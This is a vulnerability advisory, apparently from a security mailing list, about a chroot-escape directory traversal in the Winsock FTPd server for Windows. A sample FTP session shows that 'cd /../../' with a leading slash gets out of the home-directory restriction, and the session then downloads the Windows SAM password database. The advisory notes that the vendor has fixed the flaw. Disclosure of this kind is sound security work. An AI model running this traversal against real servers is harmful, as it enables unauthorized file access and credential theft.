Winsock FTPd is an ftp server for Windows 95/98/NT/2K, by Texas Imperial Software. It is a simple, inexpensive, and easy to set ftp server for Windows machines. A vulnerability in the server allows normal users with FTP access to escape their directory restriction, and enter directory where they would usually not have access to, allowing them to read any locally available file.
In Winsock FTPd, there is an option called "Restrict to home directory and below" where the server makes a chroot jail for the user. Lets see an example:
-----snip------
c:>ftp target.com
Connected to target.com
User (target.com:(none)): io
331 Give me your password, please
Password: XXXXXX
230 Logged in successfully
ftp>pwd
257 "/" is current directory
#io's directory here c:\wftpd\io
#and it is chroot'ed
ftp>ls
200 PORT command okay
150 File Listing Follows in ASCII mode.
my_file.txt
my_code.c
226 Transfer finished successfully.
11 Bytes received in 0.01 seconds (1.10 Kbytes/sec)
ftp>cd ../../
501 User is not allowed to change to ../../ - returning to /.
ftp>
#until now chroot jail working fine...
#hmmm, lets try doing 'cd /../../'
ftp>cd /../../
250 "/../.." is current directory
ftp>ls
200 PORT command okay
150 File Listing Follows in ASCII mode.
wftpd
inetpub
DOS
WINA20.386
CONFIG.DOS
CONFIG.SYS
WINNT
AUTOEXEC.BAT
Program Files
TEMP
COMMAND.COM
#even more fun
ftp>cd /../../WINNT/repair/
250 "/../../WINNT/repair/" is current directory
ftp>get /../../WINNT/repair/sam._
200 PORT command okay.......etc we got the password database file...
---------snap-------
The problem is that the chroot jail only works if the user tried ../../../ not /../../../ (Note the leading '/'), so by simply adding a "/" before ../../ any local user or even anonymous user can change his working directory to any directory on the server, combining this with ability to download any file from the server (as you saw above), the vulnerability can be used to compromise the operating system.
Fix:
Vendor contacted, A new release of Wftpd is out which fixes the problem.
